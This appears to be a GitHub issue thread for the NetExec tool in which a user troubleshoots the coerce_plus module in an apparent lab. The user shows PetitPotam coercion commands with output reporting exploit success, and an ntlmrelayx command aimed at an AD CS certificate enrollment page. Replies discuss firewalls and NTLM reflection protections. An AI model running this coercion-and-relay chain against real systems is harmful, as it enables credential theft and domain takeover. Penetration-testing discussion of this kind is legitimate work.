NetExec icon indicating copy to clipboard operation
NetExec copied to clipboard
verified publisher icon Pennyw0rth

coerce_plus help

Open sec13b opened this issue 8 months ago • 3 comments

can someone explain how work , i dont understand , no offense.

Kali ip 10.0.2.1
Windows server 10.0.0.2

example :

first command:

netexec  smb 10.0.0.2 -u 'marlboro' -p 'marlboro123' -M coerce_plus -o ALWAYS=True LISTENER=10.0.2.1

SMB         10.0.0.2       445    TABACSERVER        [*] Windows Server 2022 Build 20348 x64 (name:TABACSERVER) (domain:TABACSERVER) (signing:False) (SMBv1:False)
SMB         10.0.0.2       445    TABACSERVER        [+] TABACSERVER\marlboro:marlboro123
COERCE_PLUS 10.0.0.2       445    TABACSERVER        VULNERABLE, PetitPotam
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFile
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFileEx
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcDecryptFileSrv
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcDuplicateEncryptionInfoFile

second command:

impacket-ntlmrelayx -t http://10.0.0.2/certsrv/certfnsh.asp  -smb2support  
OR:
impacket-ntlmrelayx -t http://TABACSERVER/certsrv/certfnsh.asp  -smb2support 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections

Nothing

Thank you

sec13b avatar Apr 25 '25 17:04 sec13b

The commands are looking good. Maybe there is some firewall in between that stops the traffic? What does wireshark say?

NeffIsBack avatar Apr 26 '25 23:04 NeffIsBack

Same story here. New in relay and thinking about why I don't receive any auth. Ping from one machine to another ok.

My machine for example 192. 168.1.11 Target machine 192.168.0.12.

Command nxc smb dcip -u username -p password -M coerce_plus -o LISTENER=192.168.1.11

ntmlrelayx same No signing on target smb PC..

SantaLaMuerte avatar Apr 27 '25 03:04 SantaLaMuerte

In my Lab it works flawlessly: Image

Maybe your network setup is broken somehow

NeffIsBack avatar Apr 27 '25 15:04 NeffIsBack

try to have 2 local networks . 192.168.0.0/24 and 10.0.0.0/24

sec13b avatar Apr 27 '25 19:04 sec13b

I do that regularly. Just today I coerced multiple servers with it. Maybe your firewall/router is the problem

NeffIsBack avatar Apr 28 '25 15:04 NeffIsBack

is from the modem router firewall .

sec13b avatar Apr 28 '25 16:04 sec13b

The NTLM hash is coming from 10.0.0.2, and you trying to relay it back to the same 10.0.0.2. When using Responder, you can clearly see that the hash is being captured from that machine.

However, you cannot relay a machine’s own hash back to itself — this is blocked by Windows’ loopback protections and NTLM reflection mitigations. https://webconnection.west-wind.com/docs/User-Guide/Knowledge-Base-Topics/Windows-Authentication-Errors-on-local-Servers-Loopback-Protection.html

So in short: even though the hash is successfully captured from 10.0.0.2, relaying it back to 10.0.0.2 will not work.

lodos2005 avatar May 03 '25 09:05 lodos2005